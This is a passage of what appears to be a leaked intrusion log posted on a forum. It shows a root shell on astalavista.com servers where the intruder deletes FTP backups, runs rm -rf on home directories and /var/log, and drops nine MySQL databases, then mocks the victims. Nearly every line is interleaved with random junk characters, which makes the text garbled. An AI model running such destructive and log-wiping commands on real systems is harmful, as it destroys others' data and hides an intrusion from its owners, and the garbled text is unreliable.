250 CWD command successful.( ^4 p- L3 K& ]. L$ f
ftp> ls -la+ _" w% s4 r) H, f- `! a
227 Entering Passive Mode (212,254,194,163,2,189)
# o5 a0 c8 e6 `- H0 K" n' i150 Opening BINARY mode data connection for ‘file list’.
$ j5 c* Y# B: J* K8 B-rw-rw-rw- 1 astalavista.com users 23410936878 Apr 29 22:10 09-04-28-astacom_full.tar
3 T2 n3 u; j& Y7 f" }9 ], D" M-rw-rw-rw- 1 astalavista.com users 20617651590 Apr 29 14:18 09-04-28-astacom_full.tar.bz2
\" T1 V% s2 \& U7 Y2 X* ~-rw-rw-rw- 1 astalavista.com users 88287111 Apr 29 15:57 09-04-29-astacom_sql_full.sql.tar.bz2
4 A2 i, q; S! x- L( ~-rw-rw-rw- 1 astalavista.com users 26413034040 May 2 00:21 09-05-01-astacom-Public_HTML.tar
& _1 e1 l, a$ w' c7 z# ]/ d" O-rw-rw-rw- 1 astalavista.com users 277843549 May 1 17:29 09-05-01-astacom-SQL_Dump.tar5 z' I' y" g* ^5 w' U# X
[snip]
9 m' i0 d( h, L s/ ?226 Transfer complete.
`" u' c% o+ ` _" s7 d" y8 yftp> mdelete *
6 m( L1 w* e$ u( j4 W, r' oftp> ls -la3 A! F! a$ ]7 K& s1 z
227 Entering Passive Mode (212,254,194,163,2,193)
& K' K0 [- z3 g8 y150 Opening BINARY mode data connection for ‘file list’.
1 H0 P$ Z+ a( z/ m3 W226 Transfer complete.6 D" Z* ]7 e' v" O1 F
ftp>1 K- I) y: \! G+ X
# O/ P3 S& c- p0 D5 A8 J8 w7 xsh-3.2# cd /home" |9 D% @- Z- r( _% z; F( W, Y
sh-3.2# ls -la2 W! A; _1 E& I7 U% G# |$ y
total 120
: A2 B' M% J! I8 F( X( W7 Xdrwxr-xr-x 14 root root 4096 Mar 11 17:56 ., e; E; C; d, l/ L$ Z6 i
drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..8 t- V/ B$ F# l- c9 x9 h
drwx–x–x 9 admin admin 4096 Nov 28 2007 admin
, @4 g9 W7 f$ l) ?) r2 E+ o1 r# ~-rw——- 1 root root 8192 Jun 4 03:03 aquota.group V8 e& R$ _/ i" v7 d( K
-rw——- 1 root root 8192 Jun 3 02:45 aquota.user
% ?0 }/ ^" L8 U7 Tdrwx–x–x 6 astanet astanet 4096 Jun 4 09:51 astanet
) k0 o0 v: s, x9 Z( Qdrwxr-xr-x 2 root root 4096 Jul 29 2008 backup
; B8 G* D- `" Tdrwxr-xr-x 2 root root 4096 Sep 17 2008 backup.141618 t0 _* J" D: g1 b, H
drwx–x–x 10 com com 4096 Apr 28 12:40 com
7 c r8 B2 I& w1 vdrwxr-xr-x 2 root root 4096 May 17 2007 ftp+ x) e5 @9 F( `5 i2 @; q
drwx—— 3 jon jon 4096 Sep 21 2007 jon
0 v5 m2 e- u. r; W# wdrwx—— 2 root root 16384 Sep 11 2007 lost+found7 G+ E- n& j6 F) Y+ e" e2 l
drwxr-xr-x 2 root root 4096 Sep 14 2007 my9 V& g% X% D% } w! E" S
drwxr-xr-x 5 mysql mysql 4096 Sep 24 2007 mysqldata- A* a; J+ y2 f5 x
drwx—— 2 jon jon 4096 Sep 15 2007 test
- L0 U$ b2 b8 R9 G8 g8 O# G& H" Ddrwxrwxrwt 2 root root 4096 Jul 29 2008 tmp* n' X8 r) [ y3 @1 `- p4 ]( o
$ J! ]" O, j* l" \ z
sh-3.2# rm -rf backup/5 q$ w0 B3 B" }' Y. L: P% f1 _9 e, k
sh-3.2# rm -rf backup.14161/% `, X+ I q6 E; s
sh-3.2# rm -rf ftp/
+ C& O% }; G4 O; g vsh-3.2# rm -rf jon/5 S- c2 ^5 E3 o! z( L
sh-3.2# rm -rf my/
2 u4 n: _2 P8 L9 v" a9 }7 l8 hsh-3.2# rm -rf mysqldata// f2 q& T j6 E7 w$ X
sh-3.2# rm -rf test/
9 ~1 | I- t' v( y b; i6 ysh-3.2# rm -rf tmp/
, {! _2 i9 P$ h0 P5 Ksh-3.2# cd ~
! N( a$ i) ]" ~$ xsh-3.2# rm -rf *
# o3 k) a( C: L' ~sh-3.2# rm -rf /var/log/; \& J- G- O6 B2 q2 T) i. X. R
rm: cannot remove directory `/var/log//proftpd’: Directory not empty/ x5 z% o O% z2 j* @
sh-3.2# rm -rf /home/*0 R5 }" }* W q8 h& ]6 L9 J J
sh-3.2# mysql
# @0 \, a+ C) R" r8 ZWelcome to the MySQL monitor. Commands end with ; or \g.
' T0 s1 q# i# `* c( I4 {* ?. WYour MySQL connection id is 407156
1 R( z) w: s$ v8 o* \. pServer version: 5.0.45-community-log MySQL Community Edition (GPL)
3 q4 C- `+ l' p% {, _& U5 z. ]+ y5 G3 D4 K: d. c" S
Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.4 Y% \- A: V% ]
$ _% }2 `9 t$ `' j1 z3 e# @mysql> show databases;
- T: A' L& y- F; O: r2 y# ~+———————–+ u) u" n, C5 K. u; P
| Database |
0 ]" d/ l* \2 T' R+ j1 F+———————–+
- a+ y2 K2 y& u: N) R& O| information_schema |) I2 v# j/ r A- m' K ]
| astanet_ads |
+ c( t" S& w6 @: c! t; V& e2 Y: j8 }| astanet_mailing_lists |; v& E* w! h& ^6 P! ~
| astanet_mediawiki |
- p* {& s9 }1 o! X( B0 R. [| astanet_membersystem |
' B# {2 G5 n( m0 Y( w+ E| com_contrexx |
/ L( i, T z* p% U| com_contrexx2 |
" T y) u3 P, ?) q| com_contrexx2_live |
% C* |" ?$ E* Y8 W% P' h| da_roundcube |
7 ]* s4 w! Q/ @# v2 N# y| dolphin |
1 b/ M. _/ p( k! B| ideapool |
3 M: h! Y5 W/ ^9 x) ^7 ^ g| mysql |
0 F) S" M3 K8 M| test |2 D S0 A% r/ \. |% }$ E, R9 Q" Z
| yourmaster |" R o: c$ G/ r
+———————–+7 Y z* U3 ~1 ]5 @* U( d
14 rows in set (0.03 sec)
( I ?" t* w: K: P4 I7 J. x* X) s6 Y- p" q% G$ g- S
mysql> drop database astanet_membersystem;: |) E/ K! U4 _- Y1 s& Z3 s
droQuery OK, 46 rows affected (0.81 sec)
?# t% q% {$ T! K- C/ S
2 T$ c) |3 `3 q3 ^6 lmysql> drop database com_contrexx;
. {+ \! _+ o- f! BQuery OK, 211 rows affected (2.72 sec)0 M8 Q, U% ?6 x& x! O: @* G* Y
( ~$ B* }' |2 }1 B5 s. x
mysql> drop database com_contrexx2; d0 ^' u$ n% N; C% i9 M
Query OK, 237 rows affected (2.23 sec)
% J7 f3 J" p! l9 `' M5 I1 e- q: z) S2 t P A! {
mysql> drop database com_contrexx2_live;' m- |1 z1 W% A( W
Query OK, 227 rows affected (7.63 sec)
4 }, p! U$ c4 ~ t) }, }6 p G2 e; M
% G! l" P7 |' B( q' w; ^mysql> drop database ideapool;* y1 P2 V7 L0 l- n
Query OK, 69 rows affected (0.19 sec)5 r2 n* ]' f/ b" F9 U3 J; j
. ? Z5 E7 `) R+ G4 a& s; Gmysql> drop database yourmaster;
8 M. |2 G. o: aQuery OK, 158 rows affected (0.55 sec)9 [) }% O- a2 s; K3 n
3 w$ _. m4 Z% d+ V# C Q: A8 pmysql> drop database astanet_ads;- Y; `5 D- b8 G0 |- N* W3 w
Query OK, 9 rows affected (0.11 sec)" R5 N7 }, K# @4 e
! ^6 ] j: T- A8 H5 Z+ P9 {8 E
mysql> drop database astanet_mailing_lists;
8 U3 w1 J) S) V0 I' sQuery OK, 24 rows affected (1.47 sec)
& |" U, h: Z! r! {+ `, z! J3 h1 m; W, m' n! d0 Y8 o
mysql> drop database astanet_mediawiki;
0 I! e0 r4 X' e2 }& gQuery OK, 31 rows affected (0.51 sec)
, h* i/ \3 P! Q& H9 S* P& q: |
' J+ Z; U1 x* d1 M& }! d$ I; ~$ jmysql> show databases;
: L5 |& g# ] |: s& n# v+ h; N+——————–+& B5 v% g; [- f6 W
| Database |& {% N( g2 j6 O3 J
+——————–+
* w" F8 s5 C3 N( t7 V| information_schema |1 } ~2 W1 q- D$ ?9 U: j& s
| da_roundcube | W3 |) P& Y# L. Q: _' g( K* g+ O
| dolphin |* I. _4 n% h3 _, u3 ?5 m; |' U `
| mysql |
9 n$ b( D* l3 e% Y+ @* b, H| test |
* D/ M. T" L% A p8 v+——————–+, s) k8 F/ A2 x) R& @$ q
5 rows in set (0.00 sec)7 o2 k F# L9 g: s1 L; r, Y
) ]7 T* M% T" M% sWhat a journey! We’re not sure exactly why the “Terminator” had any influence on
6 K2 o; B. F d4 O! Z8 _2 wtheir naming (conventions) but we’re sure Arnold himself wouldn’t be in the/ r* t% v/ O9 e2 r2 p- N
wrong to say this pack of morons *wont be back*.! h8 x- S2 l* k) B; l C
|
发表于 2012-11-6 21:07:34
收藏
支持
反对